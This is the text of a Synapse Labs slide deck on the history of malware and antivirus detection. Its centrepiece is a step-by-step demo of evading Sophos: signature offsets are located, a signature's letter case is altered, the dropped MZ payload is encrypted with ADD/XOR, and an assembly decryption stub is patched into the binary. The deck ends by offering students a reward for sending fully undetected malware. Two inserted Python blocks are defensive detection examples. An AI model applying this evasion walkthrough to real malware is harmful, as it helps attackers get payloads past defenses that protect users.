http://www.synapse-labs.com [email protected]

AntiVirus HAX!
Presented by Ehab Hussein

Synapse Malware research team :
Sofiane Talmat (Algeria)
Ehab Hussein (Egypt)
Saad Talaat (Egypt)
Amr Thabet (Egypt)

Synapse Intro

History

AV Detection Techniques

Bypassing Sophos :) Demo

Student Bounty Challenge $$$


Solution

Development

Security

Services

Corporate Services

Trainings


Viruses don't harm, ignorance does!

« The Evolution of malware within the last ten years is described by the evolution of people who develop that » (Eugene Kaspersky)

– 1948 – 1966 (First theoretical Approach)

John von Neumann « Theory of self-reproducing automata »

– 1971 (First Worm)
Robert (Bob) H. Thomas (BBN technologies)

"I'm the creeper, catch me if you can!"
Machine : PDP-10
System : TENEX
Transport : ARPANET, the world's first operational packet switching network and the core network of a set that came to compose the global Internet. Funded by DARPA.

WORM

TROJAN HORSE

– 1974/1975 (First Trojan Virus)

John Walker « ANIMAL » UNIVAC 1108


– 1982/1982 (First microcomputer Virus)

Rich Skrenta « Elk Cloner »

Apple II Boot Sector

BOOT SECTOR

– 1986 (First IBM-PC Virus)
Basit & Amjad Farooq Alvi

« Brain Boot Sector » « Pakistan Flu » « Lahore »

– 1986 (First File Infector Virus)

Ralf Burger « Virdem model » .com

VirDem Ver.: 1.06 (Generation #) aktive. Copyright by R.Burger 1986,1987 Phone.: D - 05932/5451 This is a demoprogram for computerviruses. Please put in a number now. If you're right, you'll be able to continue. The number is between 0 and x

COM INFECTION

1987 (Destructive Virus)
Vienna / Lehigh / Yale / Stoned / Ping Pong

Cascade (self-encrypting file virus)
IBM Antivirus

1987 Jerusalem
« Infecting .EXE » / Interrupt / Friday 13th

Aliases : 1808 (EXE), 1813 (COM), ArabStar, BlackBox, BlackWindow, Friday13th, HebrewUniversity, Israeli, PLO, Russian

EXE Infection

1988 (First Internet Worm)
Robert Tappan Morris

« The Morris worm » / Buffer Overflow / 6000 infections

BUFFER OVERFLOW

1988 (First Multipartite Virus)
Ghostball

EXE/COM/Boot Sector

Multipartite virus
A multipartite virus is a computer virus that infects and spreads in multiple ways. The term was coined to describe the first viruses that included DOS executable files and PC BIOS boot sector virus code, where both parts are viral themselves. For a complete cleanup, all parts of the virus must be removed.

1988 (First Polymorphic Virus)
Mark Washburn & Ralf Burger

« the Chameleon family » « Vienna and Cascade »

1260

Polymorphism

1995 (First Macro Virus)
« Concept »

Sub MAIN
REM That's enough to prove my point
End Sub

Macro Virus
A macro is a language built into a software application such as a word processor. Since some applications (notably, but not exclusively, the parts of Microsoft Office) allow macro programs to be embedded in documents, the programs may be run automatically when the document is opened.

1998 Chen Ing Hau « CIH v1 »

« Chernobyl / Spacefiller »

Payload : overwriting critical information on infected system drives and, more importantly, in some cases corrupting the system BIOS.

1999 (Year of the worms)

Jan 20: Happy99 worm (emails) (Spanska)

March 26: Melissa worm (Microsoft Word/ Outlook)

June 06: ExploreZip worm(Microsoft Office documents)

December 30: Kak worm (Javascript worm / Outlook Express bug)


2000 (The most damaging worm ever) « ILOVEYOU worm (VBS/Loveletter) »

VBScript


2000 (The year of Exploits)

May : Sadmind worm (Sun Solaris / Microsoft IIS)

July : Code Red worm (Microsoft IIS indexing)

September : Nimda worm (Windows / Code Red / Sadmind)

October : Klez worm (MS IE / MS Outlook / Outlook Express)

2002 (Metamorphic virus)
Mental Driller

« Win32/Simile » (Etap / MetaPHOR) / 90% metamorphic / May 14 / System locale

METAMORPHIC VIRUS

Metamorphic code is code that can reprogram itself. Often it does this by translating its own code into a temporary representation, editing that temporary representation, and then writing itself back to normal code again. This procedure is applied to the virus itself, so the metamorphic engine itself also undergoes changes. Some viruses use this when they are about to infect new files, and the result is that the "children" never look like their "parents".

2002/2003 (Rise of the RAT & Trojans)
A RAT, or remote access trojan (sometimes remote administration tool), is a program that listens for and accepts connections from a remote 3rd party and carries out the commands that 3rd party gives it...

Beast (Delphi)

Optix Pro

Graybird

ProRat

2004 (First Webworm)
« Santy »

- Target : phpBB forums
- 40 000 sites infected

2006 (First ever Mac OS X virus)
« OSX/Leap-A or OSX/Oompa-A »

LAN worm

Bonjour Protocol (iChat buddy list)

2007 « ZEUS » (drive-by downloads / phishing)

June 2009 : 74,000 FTP

3.6 million infections in USA

28 Oct. 2009 : 1.5 million phishing messages on Facebook

14/15 Nov. 2009 : 9 million infected emails (Verizon Wireless)

Credit cards of 15 banks compromised

1 Oct. 2010 : FBI / 70 million $ and 90 arrests

May 2011 : source code release

2007 (Bounty : 250 000 $) « Conficker »

NetBIOS Exploits MS08-067

BOTNET

Cyber Weapons !!!!!

2010 : STUXNET
Destructive (targets industrial systems)

2011 : Duqu
NON Destructive (targets industrial systems to gather information that could be useful in attacking)

AntiViruses

Possibly the first publicly documented removal of a computer virus in the wild was performed by Bernd Fix in 1987. Enough Said...

Detections

Signature Based Detection

Behaviour Based Detection

Normalization

What About rootkits

Signature-Based File Integrity Monitoring (ex: Tripwire)

Hooking Detection

Network-Based Detection

Heuristics-Based Detection
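What "Normalization" buys on top of plain signature matching, as an added example (not code from the Synapse slides): a minimal byte-signature scanner run once exactly and once after case-folding both sides. The signature string "turko" is the one the demo later in this deck patches by "playing with case"; the sample buffer it is scanned against is constructed here and is not real malware.

```python
# Added example (not from the Synapse slides): a minimal signature scanner that
# shows what a normalization pass adds to plain byte-signature matching.
from typing import List


def find_signature(data: bytes, signature: bytes, normalize: bool = False) -> List[int]:
    """Return every offset at which `signature` occurs in `data`.

    normalize=False is plain byte matching: flipping the case of one letter in
    the sample (a single bit, 0x20) is enough to make the signature miss.
    normalize=True case-folds both the sample and the signature first, so
    case-only edits of an ASCII string no longer evade the match.
    """
    if normalize:
        haystack, needle = data.lower(), signature.lower()   # ASCII-only fold
    else:
        haystack, needle = data, signature
    offsets: List[int] = []
    start = 0
    while True:
        idx = haystack.find(needle, start)
        if idx < 0:
            return offsets
        offsets.append(idx)
        start = idx + 1   # keep going so overlapping/repeated hits are all reported


# Constructed sample (assumption, not a real binary): "turko" once as-is and
# twice with the case trick from the demo, surrounded by filler bytes.
SAMPLE = (b"\x00" * 16 + b"turko" + b"\x90" * 8
          + b"TuRkO" + b"\x00" * 4 + b"TURKO" + b"\xcc" * 8)


def demo() -> dict:
    """Exact scan finds only the untouched copy; the normalized scan finds all three."""
    return {
        "exact": find_signature(SAMPLE, b"turko"),                    # [16]
        "normalized": find_signature(SAMPLE, b"turko", normalize=True),  # [16, 29, 38]
    }


if __name__ == "__main__":
    print(demo())
```

Case-folding is only a sound normalization for fields that really are ASCII text (resource names, strings, file names); applied blindly to code bytes it rewrites every byte in 0x41-0x5A and so manufactures false positives, which is why engines normalize per region rather than over the whole file.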


Let's Bypass That AV #Demo

1- Locate the signature :

In our case we have :

A- the signature turko, found at the following offsets (each match 5 bytes long) :

0x00003F87 0x00000005
0x00004343 0x00000005
0x000044EF 0x00000005
0x0002E754 0x00000005
0x0002E76C 0x00000005
0x0002E78F 0x00000005

B- the start of the MZ file to be dropped
The MZ signature starts at 37D64 : MZP

Before the MZP there is another signature in Unicode starting at 37D1A; it starts with the Unicode string DENAME.

2- Patching the signature :

A- the signature turko
All we can do is change some chars to capital letters (playing with case) for all the patterns found.

B- we need to encrypt the signature starting from 37D1A (43F11A in debugger)

From Hexworkshop we load the exe and go to the address 37D1A (43F11A in debugger).

We select from there till the end of the file (approx 0xBC6E bytes).

We go to Tools/Operations and apply some encryption, for example :

Add 20
Xor 27

Now back in the debugger, we load the exe and go to the DATA section at address 43F11A and select the following part :

0043F11A 44 00 45 00 4E 00 45 00 D.E.N.E.
0043F122 4D 00 45 00 06 00 44 00 M.E..D.
0043F12A 56 00 43 00 4C 00 41 00 V.C.L.A.
0043F132 4C 00 03 00 45 00 44 00 L..E.D.
0043F13A 54 00 0B 00 50 00 41 00 T..P.A.
0043F142 43 00 4B 00 41 00 47 00 C.K.A.G.
0043F14A 45 00 49 00 4E 00 46 00 E.I.N.F.
0043F152 4F 00 07 00 52 00 4F 00 O..R.O.
0043F15A 4F 00 54 00 4B 00 49 00 O.T.K.I.
0043F162 54 00 4D 5A 50 T.MZP

We put a memory breakpoint on access on it.

We run the exe; the breakpoint is hit at the following instruction :

7C9350C0 0FB706 MOVZX EAX,WORD PTR DS:[ESI]

We can see it's in NTDLL.DLL, so we look into the stack and search for the return address into our binary to locate the original call address. We find the following in the stack :

0012FF00 |00403EC9 É>@. RETURN to unpacked.00403EC9 from <JMP.&KERNEL32.FindResourceA>
0012FF04 |00400000 ..@. ASCII "MZP"
0012FF08 |00403F68 h?@. ASCII "EDT"
0012FF0C |0000000A ....
0012FF10 |0012FF3C <ÿ. Pointer to next SEH record

We go to the address 00403EC9 and find the following instructions :

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA
00403EC9 |. 8BF0 MOV ESI,EAX
00403ECB |. 85F6 TEST ESI,ESI
00403ECD |. 74 6B JE SHORT unpacked.00403F3A

We take the instruction that comes before the return address :

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA

We save that address and instruction for later.

Next step: we go to the end of the exe, let's say address 004307A2, and write our decryption function :

004307A2 > 60 PUSHAD
004307A3 . 9C PUSHFD
004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A
004307A9 . B9 E6BC0000 MOV ECX,0BCE6
004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI] ; |
004307B0 . 80F3 27 XOR BL,27 ; |
004307B3 . 80EB 20 SUB BL,20 ; |
004307B6 . 881F MOV BYTE PTR DS:[EDI],BL ; |
004307B8 . 47 INC EDI ; |
004307B9 .^E2 F3 LOOPD SHORT Copy_of_.004307AE ; |
004307BB . 9D POPFD ; |
004307BC . 61 POPAD ; |

Now we change the instruction :

00403EC4 |. E8 AFF8FFFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA (CALL 00403778)

to the following :

00403EC4 . E9 D9C80200 JMP Copy_of_.004307A2 ; (JMP 004307A2)

so that execution jumps to our decryption function.

Then we add the overwritten instruction and a jmp back after our decryption function, like the following :

004307A2 > 60 PUSHAD
004307A3 . 9C PUSHFD
004307A4 . BF 1AF14300 MOV EDI,Copy_of_.0043F11A
004307A9 . B9 E6BC0000 MOV ECX,0BCE6
004307AE > 8A1F MOV BL,BYTE PTR DS:[EDI] ; |
004307B0 . 80F3 27 XOR BL,27 ; |
004307B3 . 80EB 20 SUB BL,20 ; |
004307B6 . 881F MOV BYTE PTR DS:[EDI],BL ; |
004307B8 . 47 INC EDI ; |
004307B9 .^E2 F3 LOOPD SHORT Copy_of_.004307AE ; |
004307BB . 9D POPFD ; |
004307BC . 61 POPAD ; |
004307BD . E8 B62FFDFF CALL <JMP.&KERNEL32.FindResourceA> ; \FindResourceA
004307C2 .^E9 0237FDFF JMP Copy_of_.00403EC9

Last step is to mark our memory location at 0043F11A as writable so we can decrypt the data there; we do it with PE Explorer, for example.
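The detection-side counterpart of step 2B, as an added example that is not part of the slides: an analyst triage helper that looks for an embedded PE image whose bytes were transformed with a per-byte ADD followed by an XOR, the scheme the demo applies to the dropped resource (Add 20 / Xor 27). Instead of hunting for the two-byte "MZ" header, it searches for the DOS-stub string every linker emits, tries all 256×256 (add, xor) key pairs, and then decodes the bytes just before the hit to recover the header offset. The carrier buffer is constructed here (assumption, not a real sample); the UTF-16 resource name DENEME is taken from the dump shown earlier in the demo.

```python
# Added example (not from the Synapse slides): triage helper that finds an
# embedded PE image whose bytes were transformed with a per-byte ADD followed
# by an XOR, the scheme the demo applies to the dropped resource (Add 20 / Xor 27).
from typing import Optional, Tuple

# Nearly every PE built by a normal linker carries this DOS-stub string, which
# makes it a far more reliable marker than the two-byte "MZ" header alone.
DOS_STUB_MARKER = b"This program cannot be run in DOS mode"

# One 256-byte translation table per XOR key, so the inner loop is a C-level
# translate() followed by a C-level find().
_XOR_TABLES = [bytes(i ^ x for i in range(256)) for x in range(256)]


def encode_add_xor(data: bytes, add: int, xor: int) -> bytes:
    """Forward transform from the demo: (b + add) mod 256, then ^ xor."""
    table = bytes((((i + add) & 0xFF) ^ xor) for i in range(256))
    return data.translate(table)


def decode_add_xor(data: bytes, add: int, xor: int) -> bytes:
    """Inverse transform, in the order the slide's stub uses: XOR first, then SUB."""
    table = bytes((((i ^ xor) - add) & 0xFF) for i in range(256))
    return data.translate(table)


def find_encoded_pe(data: bytes, marker: bytes = DOS_STUB_MARKER) -> Optional[Tuple[int, int, int]]:
    """Try all 256*256 (add, xor) pairs and return (marker_offset, add, xor) for
    the first encoded copy of `marker` found in `data`, or None if there is none.

    (add, xor) and (add + 128, xor ^ 0x80) are the same byte transform, so the
    pair returned is one representative; add == xor == 0 means a plaintext PE.
    """
    added = [bytes(((c + a) & 0xFF) for c in marker) for a in range(256)]
    for a in range(256):
        for x in range(256):
            idx = data.find(added[a].translate(_XOR_TABLES[x]))
            if idx >= 0:
                return idx, a, x
    return None


def locate_header(data: bytes, hit: Tuple[int, int, int], window: int = 0x80) -> Optional[int]:
    """Decode the bytes just before a marker hit and return the offset of the
    nearest preceding "MZ" header; the DOS stub sits within ~0x80 bytes of it."""
    marker_off, a, x = hit
    start = max(0, marker_off - window)
    plain = decode_add_xor(data[start:marker_off], a, x)
    mz = plain.rfind(b"MZ")
    return None if mz < 0 else start + mz


def build_sample() -> bytes:
    """Constructed carrier (assumption, not real malware): 104 bytes of filler,
    then a resource laid out like the demo's dump (the UTF-16 name "DENEME"
    followed by a tiny fake DOS header), all encoded with ADD 0x20 / XOR 0x27."""
    resource_name = "DENEME".encode("utf-16-le")
    fake_pe = b"MZ" + b"\x00" * 62 + DOS_STUB_MARKER + b".\r\n$" + b"\x00" * 32
    encoded = encode_add_xor(resource_name + fake_pe, 0x20, 0x27)
    return b"\x4d\x5a\x90\x00" + b"\xcc" * 100 + encoded


def triage(data: bytes) -> Optional[dict]:
    """Full check: report the key pair, marker offset and recovered header offset."""
    hit = find_encoded_pe(data)
    if hit is None:
        return None
    return {"marker_offset": hit[0], "add": hit[1], "xor": hit[2],
            "mz_offset": locate_header(data, hit)}


if __name__ == "__main__":
    print(triage(build_sample()))
```

In practice this runs over the resource section (or the whole overlay) of a suspect binary rather than over a toy buffer; a hit with a non-zero key pair is a strong triage signal, because legitimate resources essentially never contain a byte-transformed executable. The brute force is 65536 C-level searches, which stays well under a second on resource-sized inputs, and the same search generalises to XOR-only or ADD-only encoders since those are just the (0, x) and (a, 0) pairs.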


Bounty challenge
50$ discount on any Synapse course & recognition on the synapse-labs Facebook page

To the student that will send us fully undetected malware using our same technique from the demo.

Thank you
Facebook.com/Synapse.Labs

Twitter : @Synapse_Labs

My Twitter : @__Obzy__
My FaceBook : www.facebook.com/Obzysynapse